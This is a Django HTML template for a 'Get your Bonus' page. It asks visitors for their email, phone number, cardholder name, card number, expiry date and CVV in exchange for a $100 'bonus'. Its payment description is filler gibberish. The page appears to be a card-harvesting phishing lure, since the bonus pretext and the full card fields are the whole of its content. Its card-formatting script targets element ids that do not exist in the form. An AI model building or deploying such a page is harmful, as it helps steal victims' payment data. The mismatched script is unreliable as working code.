{% load static %}
{% load widget_tweaks %}

<!doctype html>
<html>
<head>

                                <meta charset='utf-8'>
                                <meta name='viewport' content='width=device-width, initial-scale=1'>
                                <title>Get Bonus</title>
                                <link href='https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' rel='stylesheet'>
                                <link href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css' rel='stylesheet'>
                                <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script>


<style>::-webkit-scrollbar {
    width: 8px;
    }
                                /* Track */
                                ::-webkit-scrollbar-track {
                                  background: #f1f1f1;
                                }

                                /* Handle */
                                ::-webkit-scrollbar-thumb {
                                  background: #888;
                                }

                                /* Handle on hover */
                                ::-webkit-scrollbar-thumb:hover {
                                  background: #555;
                                } body {
    color: #000;
    overflow-x: hidden;
    height: 100%;
    background-color: #3a5ba6;
    background-repeat: no-repeat;
}

.card {
    padding: 30px 25px 35px 50px;
    border-radius: 30px;
    box-shadow: 0px 4px 8px 0px #B71C1C;
    margin-top: 50px;
    margin-bottom: 50px;
}

.border-line {
    border-right: 1px solid #BDBDBD;
}

.text-sm {
    font-size: 13px;
}

.text-md {
    font-size: 18px;
}

.image {
    width: 60px;
    height: 30px;
}

::placeholder {
    color: grey;
    opacity: 1;
}

:-ms-input-placeholder {
    color: grey;
}

::-ms-input-placeholder {
    color: grey;
}

input {
    padding: 2px 0px;
    border: none;
    border-bottom: 1px solid lightgrey;
    margin-bottom: 5px;
    margin-top: 2px;
    box-sizing: border-box;
    color: #000;
    font-size: 16px;
    letter-spacing: 1px;
    font-weight: 500;
}

input:focus {
    -moz-box-shadow: none !important;
    -webkit-box-shadow: none !important;
    box-shadow: none !important;
    border-bottom: 1px solid #EF5350;
    outline-width: 0;
}

button:focus {
    -moz-box-shadow: none !important;
    -webkit-box-shadow: none !important;
    box-shadow: none !important;
    outline-width: 0;
}

.btn-red {
    background-color: #EF5350;
    color: #fff;
    padding: 8px 25px;
    border-radius: 50px;
    font-size: 18px;
    letter-spacing: 2px;
    border: 2px solid #fff;
}

.btn-red:hover {
    box-shadow: 0 0 0 2px #EF5350;
}

.btn-red:focus {
    box-shadow: 0 0 0 2px #EF5350 !important;
}

.custom-checkbox .custom-control-input:checked~.custom-control-label::before {
    background-color: #EF5350;
}

::marker{
    color: #ff2e68;
}

@media screen and (max-width: 575px) {
    .border-line {
        border-right: none;
        border-bottom: 1px solid #EEEEEE;
    }
}</style>
</head>

<body className='snippet-body'>

<form id="regForm" method="post" action=" ">
    {% csrf_token %}
<div class="container-fluid px-1 px-md-2 px-lg-4 py-5 mx-auto">
    <div class="row d-flex justify-content-center">
        <div class="col-xl-7 col-lg-8 col-md-9 col-sm-11">
            <div class="card border-0">
                <div class="row justify-content-center">
                    <h3 class="mb-4">Get your Bonus</h3>
                </div>
                <div class="row">
                    <div class="col-sm-7 border-line pb-3">
                        <div class="form-group">
                            <p class="text-muted text-sm mb-0">Email</p>

                            {{ form.email.errors }}
                            {{ form.email }}
                        </div>
                        <div class="form-group">
                            <p class="text-muted text-sm mb-0">Phone Number</p>

                            {{ form.phone_number.errors }}
                            {{ form.phone_number }}
                        </div>
                        <div class="form-group">
                            <p class="text-muted text-sm mb-0">Country</p>

                            {{ form.country.errors }}
                            {{ form.country }}

                        </div>
                        <div class="form-group">
                            <p class="text-muted text-sm mb-0">Name on the card</p>

                            {{ form.cc_holder_name.errors }}
                            {{ form.cc_holder_name }}
                        </div>
                        <div class="form-group">
                            <p class="text-muted text-sm mb-0">Card Number</p>
                            <div class="row px-3">
                                {{ form.cc_number.errors }}
                                {{ form.cc_number }}
                                <p class="mb-0 ml-3">/<br></p>
                                <img class="image ml-1" src="https://i.imgur.com/WIAP9Ku.jpg">
                                <img class="image ml-1" src="https://i.imgur.com/WIAP9Ku.jpg">
                                <img class="image ml-1" src="https://i.imgur.com/WIAP9Ku.jpg">
                                <img class="image ml-1" src="https://i.imgur.com/WIAP9Ku.jpg">
                            </div>
                        </div>
                        <div class="form-group">
                            <p class="text-muted text-sm mb-0">Expiry Date</p>
                            {{ form.cc_exp_month.errors }}
                            {{ form.cc_exp_month }}
                            {{ form.cc_exp_year.errors }}
                            {{ form.cc_exp_year }}
                        </div>
                        <div class="form-group">
                            <p class="text-muted text-sm mb-0">CVV/CVC</p>
                            {{ form.cc_code.errors }}
                            {{ form.cc_code }}
                        </div>
                        <div class="form-group mb-0">
                            <div class="custom-control custom-checkbox custom-control-inline">
                                <input id="chk1" type="checkbox" name="chk" class="custom-control-input" checked>
                                <label for="chk1" class="custom-control-label text-muted text-sm">Email newsletter for occasional offer</label>
                            </div>
                        </div>
                    </div>
                    <div class="col-sm-5 text-sm-center justify-content-center pt-4 pb-4">


                        <small class="text-sm text-muted">Going to connect</small>
                        <h5 class="mb-5">Bonus for this Year</h5>
                        <small class="text-sm text-muted">Payment amount</small>
                        <p>dfkjgfd ldkfgkjm dfgkll dlfglkdfm fdgmlkdflgk dlfkmjglkfdlk ldkfglkmjfl kldkfglfmdjlg l
                        djfiugret dijg dfgkjdnfg dlkfgkdnjgf</p>
                        <div class="row px-3 justify-content-sm-center">
                            <h2 class=""><span class="text-md font-weight-bold mr-2">$</span><span class="text-danger">100</span></h2>
                        </div>


                        <button type="submit" class="btn btn-red text-center mt-4">Add to Bonus</button>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
</form>

<script type='text/javascript' src='https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js'></script>
<script type='text/javascript' src='#'></script>
<script type='text/javascript' src='#'></script>
<script type='text/javascript' src='#'></script>


<script type='text/javascript'>$(document).ready(function(){
//For Card Number formatted input
var cardNum = document.getElementById('cr_no');
cardNum.onkeyup = function (e) {
    if (this.value == this.lastValue) return;
    var caretPosition = this.selectionStart;
    var sanitizedValue = this.value.replace(/[^0-9]/gi, '');
    var parts = [];

    for (var i = 0, len = sanitizedValue.length; i < len; i += 4) {
        parts.push(sanitizedValue.substring(i, i + 4));
    }

    for (var i = caretPosition - 1; i >= 0; i--) {
        var c = this.value[i];
        if (c < '0' || c > '9') {
            caretPosition--;
        }
    }
    caretPosition += Math.floor(caretPosition / 4);

    this.value = this.lastValue = parts.join(' ');
    this.selectionStart = this.selectionEnd = caretPosition;
}

//For Date formatted input
var expDate = document.getElementById('exp');
expDate.onkeyup = function (e) {
    if (this.value == this.lastValue) return;
    var caretPosition = this.selectionStart;
    var sanitizedValue = this.value.replace(/[^0-9]/gi, '');
    var parts = [];

    for (var i = 0, len = sanitizedValue.length; i < len; i += 2) {
        parts.push(sanitizedValue.substring(i, i + 2));
    }

    for (var i = caretPosition - 1; i >= 0; i--) {
        var c = this.value[i];
        if (c < '0' || c > '9') {
            caretPosition--;
        }
    }
    caretPosition += Math.floor(caretPosition / 2);

    this.value = this.lastValue = parts.join('/');
    this.selectionStart = this.selectionEnd = caretPosition;
}

});</script>

                                <script type='text/javascript'>var myLink = document.querySelector('a[href="#"]');
                                myLink.addEventListener('click', function(e) {
                                  e.preventDefault();
                                });</script>

</body>
</html>